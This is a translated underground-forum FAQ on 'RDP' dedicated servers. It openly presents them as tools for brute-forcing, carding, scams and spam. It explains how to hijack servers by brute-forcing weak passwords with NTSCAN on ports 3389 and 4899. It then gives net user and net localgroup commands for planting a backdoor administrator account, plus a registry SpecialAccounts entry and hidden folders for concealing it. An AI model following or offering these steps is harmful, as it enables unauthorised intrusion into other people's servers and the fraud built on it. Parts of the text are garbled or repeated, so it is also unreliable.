Anonymity Dedicated Server (RDP) FAQ. What are "RDP" and what they are eaten with.

Core

Regular
Joined
21.09.20
Messages
85
Reaction score
249
Points
33
The article was created for general development and updating \ obtaining new knowledge in this area. I am not teaching you to do anything, I am only teaching you a theory.

It will be useful for those new to this business or those who would like to learn something new.

RDP - obviously came from the English word "dedicated", which means dedicated from English. RDP, as they are usually called, on which there are quite powerful network interfaces, channels and a rather weak hardware configuration are used for data processing, as well as for storing databases or any other material located on them for servicing personnel, companies or organizations.

How to connect to Dedicated Server?

You can connect to Dedicated Server using the built-in Windows utility: Remote Desktop Connection. Start => Programs => Accessories => Communication => Remote Desktop Connection. You can also do this: Start => Run => mstsc. Another utility for connecting to a Dedicated Server is [BL4CK] VNC Viewer: Authentication Bypass. Just run it and enter the ip address of the Dedicated Server. You can also use Dedicated Server by admin if it is installed on Dedicated Server.

What do you need to pay attention to when choosing a Dedicated Server?

Channel, Memory (RAM), Stone (processor), OS. Here are some examples:

Quote: Intel (R) Pentium (R) 4 CPU 2.80GHz, 3.00 GB of RAM \ 2003 os \ 1 gb

Intel (R) Pentium (R) 4 CPU 3.20GHz, 2.00 GB of RAM \ 2003 os \ 100 mb

Intel (R) Xeon (TM) CPU 3.06GHz \ 3.80 GB of RAM \ 2003 os \ 100 mb

What is Dedicated Server (RDP) for?

Well, for example, for brute, hacking, carding, scam, flood, spam, gray schemes.

Where can I get a Dedicated Server?

1. Purchase.
2. Hacking the server.
3. Distribution.

How to hack a Dedicated Server?

You can scan RDP with simple TCP / IP scanners So, there is such a program that you can find on the network, and it is called NTSCAN. It does the following: when a certain range is selected, it scans the server for simple passwords. The program has a pretty good choice of attack method, and the likelihood of hacking the server with its help is very high, since admins often set simple passwords to the server, especially on foreign ones. The program works on the brutal principle: it sends a request for authorization on the server and receives a response from the north. If authorization is successful, it displays a list of servers at the bottom of the program. Now the main thing is to select the scanning range and configure the program for efficient operation. At the top, we enter the range of IP servers, as you probably already understood. Further, HostFile - a list of hosts (I did not use this option), here you can create a file with specific hosts and brute-force specific hosts. I left the streams as they are: 50, Timeout - the same. ConnectShare - connection to shared resources. You can choose the attack method: IPCscan, SMBscan, WMIscan. Further, "ping from host" - ping hosts, that is, checking for survivability of the host before attempting an attack, so as not to brute-force dead hosts. Scan host opened port - scan hosts with open port 139, but you can also change it if you want. Speed - speed of work of brute (brute-force passwords). "ping from host" - ping hosts, that is, checking the host's survivability before attempting an attack, so as not to idle dead hosts. Scan host opened port - scan hosts with open port 139, but you can also change it if you want. Speed - the speed of the brute-force (brute-forcing passwords). "ping from host" - ping hosts, that is, checking the host's survivability before attempting an attack, so as not to idle dead hosts. Scan host opened port - scan hosts with open port 139, but you can also change it if you want. Speed - speed of work of brute (brute-force passwords).

What ports should you scan?

TCP ports: 3389 is the port used by Remote Desktop

Port 4899, which is used by the radmin - the Remote Administrator program.

I have a Dedicated Server, I want to add a new user. How to implement this?

Open Administrative Tools => Computer Management => find the Local Users and Groups tab => right-click on the Users tab => Create new user.


Code:
net user username / add

net start (stop) service_name

How to disguise your arrival?

First, we need to create our own account. Because if we sit through the administrator's account, then it is 90% that he will lose us! We don’t need that! So read carefully how to make your account on someone else's Dedicated Server, and hide it! We will do this through the command line! Run the command line (Start> Run> cmd.exe) and write in it:

net user (here we write the login and password of the account that we will create! We do this through a space.)

/ add net localgroup Administrators (Here we indicate the name that you should have specified in the first line)

/ add net localgroup "Remote Desktop Users" (Here we also indicate the name that was indicated in the line above)

/ add net accounts / maxpwage: unlimited

Let's say you want to create an account named admin and password test. Then you should have this:


Code:
net user admin test / add

net localgroup Administrators admin / add

net localgroup "Remote Desktop Users" admin / add

net accounts / maxpwage: unlimited

How to hide yourself among other users?

Go to the registry (Start> Run> regedit.exe) go to HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINESOFTWARE Microsoft Windows NT CurrentVersion Winlogon SpecialAccounts UserList and create a new DWORD parameter there (right-click, new DWORD parameter)
We call this parameter the name of your account, and a numeric value.

Next, we need to hide the folder with our account, with all subdirectories and files. To do this, go to C: Documents and Settings and hide our folder there. (Right-click> properties> check the "hidden" box and click apply).

Then we go to C: WINDOWS system32 and create a folder (any name) But that's all now you can safely go to the Dedicated Server under your username and password. Now after we have logged in with our username and password, we need to hide the folder we made. This is done with the right mouse button.
 
Top Bottom